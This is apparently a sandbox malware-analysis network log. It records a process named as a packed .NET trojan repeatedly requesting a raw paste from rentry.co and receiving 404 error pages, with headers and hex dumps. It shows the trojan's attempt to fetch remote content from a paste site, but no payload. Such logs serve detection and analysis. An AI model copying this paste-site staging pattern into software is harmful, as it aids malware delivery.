                                                                                        2024-10-18 10:43:39 UTC690INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:39 UTC1369INData Raw: 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74
                                                                                        Data Ascii: s/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and edit
                                                                                        2024-10-18 10:43:39 UTC1369INData Raw: 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65
                                                                                        Data Ascii: y.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container containe
                                                                                        2024-10-18 10:43:39 UTC1032INData Raw: 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 62 62 36 64 66 36 34 37 37 32 27 2c 74 3a
                                                                                        Data Ascii: t src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edbb6df64772',t:
                                                                                        2024-10-18 10:43:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.660700104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:40 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:40 UTC691INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:40 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kTRPEsvG0l3JfHqB5tg944aV03Uc9i0ljnpePj%2BMpqKN6edBS5Br%2FJlOK%2BUaphI%2FYT77ddSBt7fHc5PC%2FHpW2BK0Pk1XDn5%2Fi3hTu%2F0Df74e8%2Bs2MU%2F7QjjRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edc2dcb54780-DFW
                                                                                        2024-10-18 10:43:40 UTC678INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:40 UTC1369INData Raw: 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75
                                                                                        Data Ascii: /static/icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom u
                                                                                        2024-10-18 10:43:40 UTC1369INData Raw: 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69
                                                                                        Data Ascii: g' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="contai
                                                                                        2024-10-18 10:43:40 UTC1044INData Raw: 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 63 32
                                                                                        Data Ascii: <script src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edc2
                                                                                        2024-10-18 10:43:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.2.660702104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:41 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:42 UTC664INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:41 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVIRD%2BZdThvr%2Bn85jh4liMWsFgb4cqCGW%2B4%2BmKZIe5z2zGtHZ%2BFgpT92LVqg2%2BkL4bjQ%2FTlau0ZffKTiICMysJi6ohqqUzwZBOYCTpEI07my2D5JXeNMAfLP3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edca088c2cbe-DFW
                                                                                        2024-10-18 10:43:42 UTC705INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:42 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <m
                                                                                        2024-10-18 10:43:42 UTC1369INData Raw: 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20
                                                                                        Data Ascii: ry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:42 UTC1017INData Raw: 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 63 61 30 38 38 63 32 63 62 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4d 53
                                                                                        Data Ascii: js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edca088c2cbe',t:'MTcyOTI0ODIyMS
                                                                                        2024-10-18 10:43:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.2.660704104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:42 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:43 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:43 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AB%2BSSt%2Fa0HgAZVV8fcxflBEfYOhQnhaZFpZheWOu75OWwKbOJYd2q70cg%2FUM2XXV9gK3usyT4CVUkuAKLaqzvWeE2fHAdoDmFObKhhO4M2DvjmxgCsf5FCyJeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edd10f7d4857-DFW
                                                                                        2024-10-18 10:43:43 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:43 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:43 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:43 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 64 31 30 66 37 64 34 38 35 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4d 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edd10f7d4857',t:'MTcyOTI0ODIyMy4wMDAwMD
                                                                                        2024-10-18 10:43:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.2.660705104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:43 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:44 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:44 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5B3rHqKAPKTKLgTxmk7cIXbftVLuO35xa0ocLNubz%2F83MHAwa5IgmwpI78ZfkT27HyQbU5oxGubNnyZX6gXlmQwTsk4AfbG3UKs6Ql3mBSadS8AngvaaUpGzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edd82ce5e9ad-DFW
